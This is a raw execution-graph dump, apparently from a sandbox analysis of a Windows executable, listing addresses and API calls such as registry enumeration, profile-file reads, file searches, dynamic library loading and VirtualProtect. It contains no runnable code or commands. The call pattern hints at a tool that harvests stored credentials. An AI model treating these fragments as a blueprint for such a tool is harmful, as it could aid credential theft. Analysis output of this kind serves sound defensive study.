                                                  execution_graph 34105 40fc40 70 API calls 34278 403640 21 API calls 34106 427fa4 42 API calls 34279 412e43 _endthreadex 34280 425115 76 API calls 34281 43fe40 133 API calls 34109 425115 83 API calls 34110 401445 memcpy memcpy DialogBoxParamA 34111 440c40 34 API calls 33239 444c4a 33258 444e38 33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type __p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 __setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm 33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA 33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 33311 404a99 LoadLibraryA 33260->33311 33262 40cf60 33299 40cf64 33262->33299 33318 410d0e 33262->33318 33264 40cf6f 33322 40ccd7 ??2@YAPAXI 33264->33322 33266 40cf9b 33336 407cbc 33266->33336 33271 40cfc4 33354 409825 memset 33271->33354 33272 40cfd8 33359 4096f4 memset 33272->33359 33277 40d181 ??3@YAXPAX 33279 40d1b3 33277->33279 33280 40d19f DeleteObject 33277->33280 33278 407e30 _strcmpi 33281 40cfee 33278->33281 33383 407948 ??3@YAXPAX ??3@YAXPAX 33279->33383 33280->33279 33283 40cff2 RegDeleteKeyA 33281->33283 33284 40d007 EnumResourceTypesA 33281->33284 33283->33277 33286 40d047 33284->33286 33287 40d02f MessageBoxA 33284->33287 33285 40d1c4 33384 4080d4 ??3@YAXPAX 33285->33384 33289 40d0a0 CoInitialize 33286->33289 33364 40ce70 33286->33364 33287->33277 33381 40cc26 strncat memset RegisterClassA CreateWindowExA 33289->33381 33291 40d1cd 33385 407948 ??3@YAXPAX ??3@YAXPAX 33291->33385 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33382 40c256 PostMessageA 33293->33382 33296 40d061 ??3@YAXPAX 33296->33279 33300 40d084 DeleteObject 33296->33300 33297 40d09e 33297->33289 33299->33255 33299->33256 33300->33279 33303 40d0f9 GetMessageA 33304 40d17b 33303->33304 33305 40d10d 33303->33305 33304->33277 33306 40d113 TranslateAccelerator 33305->33306 33308 40d145 IsDialogMessage 33305->33308 33309 40d139 IsDialogMessage 33305->33309 33306->33305 33307 40d16d GetMessageA 33306->33307 33307->33304 33307->33306 33308->33307 33310 40d157 TranslateMessage DispatchMessageA 33308->33310 33309->33307 33309->33308 33310->33307 33312 404ac4 GetProcAddress 33311->33312 33315 404ae8 33311->33315 33313 404ad4 33312->33313 33314 404add FreeLibrary 33312->33314 33313->33314 33314->33315 33316 404b13 33315->33316 33317 404afc MessageBoxA 33315->33317 33316->33262 33317->33262 33319 410d17 LoadLibraryA 33318->33319 33320 410d3c 33318->33320 33319->33320 33321 410d2b GetProcAddress 33319->33321 33320->33264 33321->33320 33323 40cd08 ??2@YAPAXI 33322->33323 33325 40cd26 33323->33325 33326 40cd2d 33323->33326 33393 404025 6 API calls 33325->33393 33328 40cd66 33326->33328 33329 40cd59 DeleteObject 33326->33329 33386 407088 33328->33386 33329->33328 33331 40cd6b 33389 4019b5 33331->33389 33334 4019b5 strncat 33335 40cdbf _mbscpy 33334->33335 33335->33266 33395 407948 ??3@YAXPAX ??3@YAXPAX 33336->33395 33338 407e04 33396 407a55 33338->33396 33341 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33348 407cf7 33341->33348 33342 407ddc 33342->33338 33408 407a1f 33342->33408 33344 407d7a ??3@YAXPAX 33344->33348 33348->33338 33348->33341 33348->33342 33348->33344 33399 40796e 7 API calls 33348->33399 33400 406f30 33348->33400 33350 407e30 33351 407e57 33350->33351 33352 407e38 33350->33352 33351->33271 33351->33272 33352->33351 33353 407e41 _strcmpi 33352->33353 33353->33351 33353->33352 33414 4097ff 33354->33414 33356 409854 33419 409731 33356->33419 33360 4097ff 3 API calls 33359->33360 33361 409723 33360->33361 33439 40966c 33361->33439 33453 4023b2 33364->33453 33370 40ced3 33542 40cdda 7 API calls 33370->33542 33371 40cece 33374 40cf3f 33371->33374 33494 40c3d0 memset GetModuleFileNameA strrchr 33371->33494 33374->33296 33374->33297 33377 40ceed 33521 40affa 33377->33521 33381->33293 33382->33303 33383->33285 33384->33291 33385->33299 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33331 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33334 33393->33326 33394->33388 33395->33348 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33350 33398->33397 33399->33348 33401 406f37 malloc 33400->33401 33402 406f7d 33400->33402 33404 406f73 33401->33404 33405 406f58 33401->33405 33402->33348 33404->33348 33406 406f6c ??3@YAXPAX 33405->33406 33407 406f5c memcpy 33405->33407 33406->33404 33407->33406 33409 407a38 33408->33409 33410 407a2d ??3@YAXPAX 33408->33410 33412 406f30 3 API calls 33409->33412 33411 407a43 33410->33411 33413 40796e 7 API calls 33411->33413 33412->33411 33413->33338 33430 406f96 GetModuleFileNameA 33414->33430 33416 409805 strrchr 33417 409814 33416->33417 33418 409817 _mbscat 33416->33418 33417->33418 33418->33356 33431 44b090 33419->33431 33424 40930c 3 API calls 33425 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33424->33425 33426 4097c5 LoadStringA 33425->33426 33429 4097db 33426->33429 33428 4097f3 33428->33277 33429->33426 33429->33428 33438 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33438 33430->33416 33432 40973e _mbscpy _mbscpy 33431->33432 33433 40930c 33432->33433 33434 44b090 33433->33434 33435 409319 memset GetPrivateProfileStringA 33434->33435 33436 409374 33435->33436 33437 409364 WritePrivateProfileStringA 33435->33437 33436->33424 33437->33436 33438->33429 33449 406f81 GetFileAttributesA 33439->33449 33441 409675 33442 4096ee 33441->33442 33443 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33441->33443 33442->33278 33450 409278 GetPrivateProfileStringA 33443->33450 33445 4096c9 33451 409278 GetPrivateProfileStringA 33445->33451 33447 4096da 33452 409278 GetPrivateProfileStringA 33447->33452 33449->33441 33450->33445 33451->33447 33452->33442 33544 409c1c 33453->33544 33456 401e69 memset 33583 410dbb 33456->33583 33459 401ec2 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33459->33613 33460 401ed4 33598 406f81 GetFileAttributesA 33460->33598 33463 401ee6 strlen strlen 33465 401f15 33463->33465 33467 401f28 33463->33467 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33614 33599 406f81 GetFileAttributesA 33467->33599 33469 401f35 33600 401c31 33469->33600 33472 401f75 33612 410a9c RegOpenKeyExA 33472->33612 33474 401c31 7 API calls 33474->33472 33475 401f91 33476 402187 33475->33476 33477 401f9c memset 33475->33477 33479 402195 ExpandEnvironmentStringsA 33476->33479 33480 4021a8 _strcmpi 33476->33480 33615 410b62 RegEnumKeyExA 33477->33615 33624 406f81 GetFileAttributesA 33479->33624 33480->33370 33480->33371 33482 40217e RegCloseKey 33482->33476 33483 401fd9 atoi 33484 401fef memset memset sprintf 33483->33484 33492 401fc9 33483->33492 33616 410b1e 33484->33616 33487 402165 33487->33482 33488 406f81 GetFileAttributesA 33488->33492 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33482 33492->33483 33492->33487 33492->33488 33492->33489 33492->33490 33492->33491 33493 402167 _mbscpy 33492->33493 33623 410b62 RegEnumKeyExA 33492->33623 33493->33482 33495 40c422 33494->33495 33496 40c425 _mbscat _mbscpy _mbscpy 33494->33496 33495->33496 33497 40c49d 33496->33497 33498 40c512 33497->33498 33499 40c502 GetWindowPlacement 33497->33499 33500 40c538 33498->33500 33645 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33498->33645 33499->33498 33638 409b31 33500->33638 33504 40ba28 33505 40ba87 33504->33505 33511 40ba3c 33504->33511 33648 406c62 LoadCursorA SetCursor 33505->33648 33507 40ba43 _mbsicmp 33507->33511 33508 40ba8c 33649 410a9c RegOpenKeyExA 33508->33649 33650 404785 33508->33650 33653 403c16 33508->33653 33729 4107f1 33508->33729 33732 404734 33508->33732 33509 40baa0 33510 407e30 _strcmpi 33509->33510 33514 40bab0 33510->33514 33511->33505 33511->33507 33740 40b5e5 10 API calls 33511->33740 33512 40bafa SetCursor 33512->33377 33514->33512 33515 40baf1 qsort 33514->33515 33515->33512 34098 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33521->34098 33523 40b00e 33524 40b016 33523->33524 33525 40b01f GetStdHandle 33523->33525 34099 406d1a CreateFileA 33524->34099 33527 40b01c 33525->33527 33528 40b035 33527->33528 33529 40b12d 33527->33529 34100 406c62 LoadCursorA SetCursor 33528->34100 34104 406d77 9 API calls 33529->34104 33532 40b136 33543 40c580 28 API calls 33532->33543 33533 40b042 33535 40b087 33533->33535 33540 40b0a1 33533->33540 34101 40a57c strlen WriteFile 33533->34101 33535->33540 34102 40a699 12 API calls 33535->34102 33537 40b0d6 33538 40b116 CloseHandle 33537->33538 33539 40b11f SetCursor 33537->33539 33538->33539 33539->33532 33540->33537 34103 406d77 9 API calls 33540->34103 33542->33371 33543->33374 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33549 33553 408db6 12 API calls 33548->33553 33550 409d54 ??2@YAPAXI 33549->33550 33552 409d8b 33549->33552 33550->33552 33566 409b9c 33552->33566 33553->33548 33555 4023c1 33555->33456 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33625 4070ae 33585->33625 33587 410e1d 33586->33587 33628 410a9c RegOpenKeyExA 33587->33628 33590 401e9e strlen strlen 33590->33459 33590->33460 33592 410e4a 33593 410e7f _mbscpy 33592->33593 33629 410d3d _mbscpy 33592->33629 33593->33590 33595 410e5b 33630 410add RegQueryValueExA 33595->33630 33597 410e73 RegCloseKey 33597->33593 33598->33463 33599->33469 33631 410a9c RegOpenKeyExA 33600->33631 33602 401c4c 33603 401cad 33602->33603 33632 410add RegQueryValueExA 33602->33632 33603->33472 33603->33474 33605 401c6a 33606 401c71 strchr 33605->33606 33607 401ca4 RegCloseKey 33605->33607 33606->33607 33608 401c85 strchr 33606->33608 33607->33603 33608->33607 33609 401c94 33608->33609 33633 406f06 strlen 33609->33633 33611 401ca1 33611->33607 33612->33475 33613->33460 33614->33467 33615->33492 33636 410a9c RegOpenKeyExA 33616->33636 33618 410b34 33619 410b5d 33618->33619 33637 410add RegQueryValueExA 33618->33637 33619->33492 33621 410b4c RegCloseKey 33621->33619 33623->33492 33624->33480 33626 4070bd GetVersionExA 33625->33626 33627 4070ce 33625->33627 33626->33627 33627->33586 33627->33590 33628->33592 33629->33595 33630->33597 33631->33602 33632->33605 33634 406f17 33633->33634 33635 406f1a memcpy 33633->33635 33634->33635 33635->33611 33636->33618 33637->33621 33639 409b40 33638->33639 33641 409b4e 33638->33641 33646 409901 memset SendMessageA 33639->33646 33642 409b99 33641->33642 33643 409b8b 33641->33643 33642->33504 33647 409868 SendMessageA 33643->33647 33645->33500 33646->33641 33647->33642 33648->33508 33649->33509 33651 4047a3 33650->33651 33652 404799 FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33934 402bd1 39 API calls 33679->33934 33799 410a9c RegOpenKeyExA 33680->33799 33683 403d0a 33684 403d1c 33683->33684 33935 402bd1 39 API calls 33683->33935 33800 402c5d 33684->33800 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33818 410a9c RegOpenKeyExA 33689->33818 33691 403d51 33692 403d61 33691->33692 33936 402b22 46 API calls 33691->33936 33819 410a9c RegOpenKeyExA 33692->33819 33695 403d87 33696 403d97 33695->33696 33937 402b22 46 API calls 33695->33937 33820 410a9c RegOpenKeyExA 33696->33820 33699 403dbd 33700 403dcd 33699->33700 33938 402b22 46 API calls 33699->33938 33821 410808 33700->33821 33704 404785 FreeLibrary 33705 403de8 33704->33705 33825 402fdb 33705->33825 33708 402fdb 34 API calls 33709 403e00 33708->33709 33841 4032b7 33709->33841 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33888 40fb00 33720->33888 33940 40f334 334 API calls 33721->33940 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 33739->33737 33740->33511 33742 4037c5 33741->33742 33743 4036fb 33741->33743 33742->33666 33941 410863 UuidFromStringA UuidFromStringA memcpy 33743->33941 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33942 4021b6 memset 33747->33942 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33943 4023e5 16 API calls 33750->33943 33751->33750 33754 4085e2 33753->33754 33944 4082cd 11 API calls 33754->33944 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33947 410b62 RegEnumKeyExA 33760->33947 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33948 410a9c RegOpenKeyExA 33764->33948 33951 410b62 RegEnumKeyExA 33764->33951 33949 410add RegQueryValueExA 33765->33949 33768 408694 33950 40848b 10 API calls 33768->33950 33770 4086ab RegCloseKey 33770->33764 33952 410a9c RegOpenKeyExA 33771->33952 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33953 410b62 RegEnumKeyExA 33775->33953 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33954 410a9c RegOpenKeyExA 33779->33954 33955 4080ed 11 API calls 33779->33955 33956 410b62 RegEnumKeyExA 33779->33956 33782 4082a2 RegCloseKey 33782->33779 33957 4045db 33783->33957 33785 4088ef 33965 404656 33785->33965 33789 408737 wcslen 33789->33785 33795 40876a 33789->33795 33790 40877a _wcsncoll 33790->33795 33792 404734 3 API calls 33792->33795 33793 404785 FreeLibrary 33793->33795 33794 408812 memset 33794->33795 33796 40883c memcpy wcschr 33794->33796 33795->33785 33795->33790 33795->33792 33795->33793 33795->33794 33795->33796 33797 4088c3 LocalFree 33795->33797 33968 40466b _mbscpy 33795->33968 33796->33795 33797->33795 33798 410a9c RegOpenKeyExA 33798->33679 33799->33683 33969 410a9c RegOpenKeyExA 33800->33969 33802 402c7a 33803 402da5 33802->33803 33804 402c87 memset 33802->33804 33803->33688 33970 410b62 RegEnumKeyExA 33804->33970 33806 402d9c RegCloseKey 33806->33803 33807 402cb2 33807->33806 33808 410b1e 3 API calls 33807->33808 33817 402d9a 33807->33817 33974 402bd1 39 API calls 33807->33974 33975 410b62 RegEnumKeyExA 33807->33975 33809 402ce4 memset sprintf 33808->33809 33971 410a9c RegOpenKeyExA 33809->33971 33811 402d28 33812 402d3a sprintf 33811->33812 33972 402bd1 39 API calls 33811->33972 33973 410a9c RegOpenKeyExA 33812->33973 33817->33806 33818->33691 33819->33695 33820->33699 33822 410816 33821->33822 33823 4107f1 FreeLibrary 33822->33823 33824 403ddd 33823->33824 33824->33704 33976 410a9c RegOpenKeyExA 33825->33976 33827 402ff9 33828 403006 memset 33827->33828 33829 40312c 33827->33829 33977 410b62 RegEnumKeyExA 33828->33977 33829->33708 33831 403122 RegCloseKey 33831->33829 33832 410b1e 3 API calls 33833 403058 memset sprintf 33832->33833 33978 410a9c RegOpenKeyExA 33833->33978 33835 4030a2 memset 33979 410b62 RegEnumKeyExA 33835->33979 33836 410b62 RegEnumKeyExA 33840 403033 33836->33840 33838 4030f9 RegCloseKey 33838->33840 33840->33831 33840->33832 33840->33835 33840->33836 33840->33838 33980 402db3 26 API calls 33840->33980 33842 4032d5 33841->33842 33843 4033a9 33841->33843 33981 4021b6 memset 33842->33981 33856 4034e4 memset memset 33843->33856 33845 4032e1 33982 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33845->33982 33847 4032ea 33848 4032f8 memset GetPrivateProfileSectionA 33847->33848 33983 4023e5 16 API calls 33847->33983 33848->33843 33853 40332f 33848->33853 33850 40339b strlen 33850->33843 33850->33853 33852 403350 strchr 33852->33853 33853->33843 33853->33850 33984 4021b6 memset 33853->33984 33985 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->33985 33986 4023e5 16 API calls 33853->33986 33857 410b1e 3 API calls 33856->33857 33858 40353f 33857->33858 33859 40357f 33858->33859 33860 403546 _mbscpy 33858->33860 33864 403985 33859->33864 33987 406d55 strlen _mbscat 33860->33987 33862 403565 _mbscat 33988 4033f0 19 API calls 33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34027 4038e8 21 API calls 33868->34027 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34035 444551 memset 33873->34035 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34047 4023e5 16 API calls 33885->34047 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34052 40f802 11 API calls 33900->34052 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34053 40759e strlen strlen 33916->34053 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API calls 33922->33923 33924 44435a 33923->33924 33925 444212 65 API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34028 4078ba 33990->34028 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34032 40466b _mbscpy 33998->34032 33999->33997 34033 4012ee strlen 33999->34033 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 34006 40f66a 34007 404785 FreeLibrary 34006->34007 34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34034 40466b _mbscpy 34011->34034 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34021 40f7e2 34015->34021 34022 40f715 34016->34022 34017 404656 FreeLibrary 34018 40f7f1 34017->34018 34019 404785 FreeLibrary 34018->34019 34020 40f7fc 34019->34020 34020->33868 34021->34017 34022->34021 34023 40f797 WideCharToMultiByte 34022->34023 34024 40f7b8 strlen 34023->34024 34025 40f7d9 LocalFree 34023->34025 34024->34025 34026 40f7c8 _mbscpy 34024->34026 34025->34021 34026->34025 34027->33868 34029 4078e6 34028->34029 34030 4078c7 _mbsnbcat 34029->34030 34031 4078ea 34029->34031 34030->34029 34031->33993 34032->34001 34033->34004 34034->34013 34048 410a9c RegOpenKeyExA 34035->34048 34037 40381a 34037->33875 34046 4021b6 memset 34037->34046 34038 44458b 34038->34037 34049 410add RegQueryValueExA 34038->34049 34040 4445a4 34041 4445dc RegCloseKey 34040->34041 34050 410add RegQueryValueExA 34040->34050 34041->34037 34043 4445c1 34043->34041 34051 444879 30 API calls 34043->34051 34045 4445da 34045->34041 34046->33878 34047->33875 34048->34038 34049->34040 34050->34043 34051->34045 34052->33899 34054 4075c9 34053->34054 34055 4075bb _mbscat 34053->34055 34056 444212 34054->34056 34055->34054 34073 407e9d 34056->34073 34059 44424d 34060 444274 34059->34060 34061 444258 34059->34061 34081 407ef8 34059->34081 34062 407e9d 9 API calls 34060->34062 34094 444196 52 API calls 34061->34094 34069 4442a0 34062->34069 34064 407ef8 9 API calls 34064->34069 34065 4442ce 34091 407f90 34065->34091 34069->34064 34069->34065 34071 444212 65 API calls 34069->34071 34095 407e62 strcmp strcmp 34069->34095 34070 407f90 FindClose 34072 4442e4 34070->34072 34071->34069 34072->33921 34074 407f90 FindClose 34073->34074 34075 407eaa 34074->34075 34076 406f06 2 API calls 34075->34076 34077 407ebd strlen strlen 34076->34077 34078 407ee1 34077->34078 34079 407eea 34077->34079 34096 4070e3 strlen _mbscat _mbscpy _mbscat 34078->34096 34079->34059 34082 407f03 FindFirstFileA 34081->34082 34083 407f24 FindNextFileA 34081->34083 34084 407f3f 34082->34084 34085 407f46 strlen strlen 34083->34085 34086 407f3a 34083->34086 34084->34085 34088 407f7f 34084->34088 34085->34088 34089 407f76 34085->34089 34087 407f90 FindClose 34086->34087 34087->34084 34088->34059 34097 4070e3 strlen _mbscat _mbscpy _mbscat 34089->34097 34092 407fa3 34091->34092 34093 407f99 FindClose 34091->34093 34092->34070 34093->34092 34094->34059 34095->34069 34096->34079 34097->34088 34098->33523 34099->33527 34100->33533 34101->33535 34102->33540 34103->33537 34104->33532 34113 411853 RtlInitializeCriticalSection memset 34114 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34287 40a256 13 API calls 34289 432e5b 17 API calls 34291 43fa5a 20 API calls 34116 401060 41 API calls 34294 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34296 405e69 14 API calls 34121 433068 15 API calls 34298 414a6d 18 API calls 34299 43fe6f 134 API calls 34123 424c6d 15 API calls 34300 426741 19 API calls 34125 440c70 17 API calls 34126 443c71 44 API calls 34129 427c79 24 API calls 34303 416e7e memset 34133 42800b 47 API calls 34134 425115 85 API calls 34306 41960c 61 API calls 34135 43f40c 122 API calls 34138 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34139 43f81a 20 API calls 34141 414c20 memset memset 34142 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34310 414625 18 API calls 34311 404225 modf 34312 403a26 strlen WriteFile 34314 40422a 12 API calls 34318 427632 memset memset memcpy 34319 40ca30 59 API calls 34320 404235 26 API calls 34143 42ec34 61 API calls 34144 425115 76 API calls 34321 425115 77 API calls 34323 44223a 38 API calls 34150 43183c 112 API calls 34324 44b2c5 _onexit __dllonexit 34329 42a6d2 memcpy 34152 405cda 65 API calls 34337 43fedc 138 API calls 34338 4116e1 16 API calls 34155 4244e6 19 API calls 34157 42e8e8 127 API calls 34158 4118ee RtlLeaveCriticalSection 34343 43f6ec 22 API calls 34160 425115 119 API calls 33187 410cf3 EnumResourceNamesA 34346 4492f0 memcpy memcpy 34348 43fafa 18 API calls 34350 4342f9 15 API calls 34161 4144fd 19 API calls 34352 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34353 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34356 443a84 _mbscpy 34358 43f681 17 API calls 34164 404487 22 API calls 34360 415e8c 16 API calls 34168 411893 RtlDeleteCriticalSection 34169 41a492 42 API calls 34364 403e96 34 API calls 34365 410e98 memset SHGetPathFromIDList SendMessageA 34171 426741 109 API calls 34172 4344a2 18 API calls 34173 4094a2 10 API calls 34368 4116a6 15 API calls 34369 43f6a4 17 API calls 34370 440aa3 20 API calls 34372 427430 45 API calls 34176 4090b0 7 API calls 34177 4148b0 15 API calls 34179 4118b4 RtlEnterCriticalSection 34180 4014b7 CreateWindowExA 34181 40c8b8 19 API calls 34183 4118bf RtlTryEnterCriticalSection 34377 42434a 18 API calls 34379 405f53 12 API calls 34191 43f956 59 API calls 34193 40955a 17 API calls 34194 428561 36 API calls 34195 409164 7 API calls 34383 404366 19 API calls 34387 40176c ExitProcess 34390 410777 42 API calls 34200 40dd7b 51 API calls 34201 425d7c 16 API calls 34392 43f6f0 25 API calls 34393 42db01 22 API calls 34202 412905 15 API calls 34394 403b04 54 API calls 34395 405f04 SetDlgItemTextA GetDlgItemTextA 34396 44b301 ??3@YAXPAX 34399 4120ea 14 API calls 34400 40bb0a 8 API calls 34402 413f11 strcmp 34206 434110 17 API calls 34209 425115 108 API calls 34403 444b11 _onexit 34211 425115 76 API calls 34214 429d19 10 API calls 34406 444b1f __dllonexit 34407 409f20 _strcmpi 34216 42b927 31 API calls 34410 433f26 19 API calls 34411 44b323 FreeLibrary 34412 427f25 46 API calls 34413 43ff2b 17 API calls 34414 43fb30 19 API calls 34223 414d36 16 API calls 34225 40ad38 7 API calls 34416 433b38 16 API calls 34417 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34229 426741 21 API calls 34230 40c5c3 125 API calls 34232 43fdc5 17 API calls 34418 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34235 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 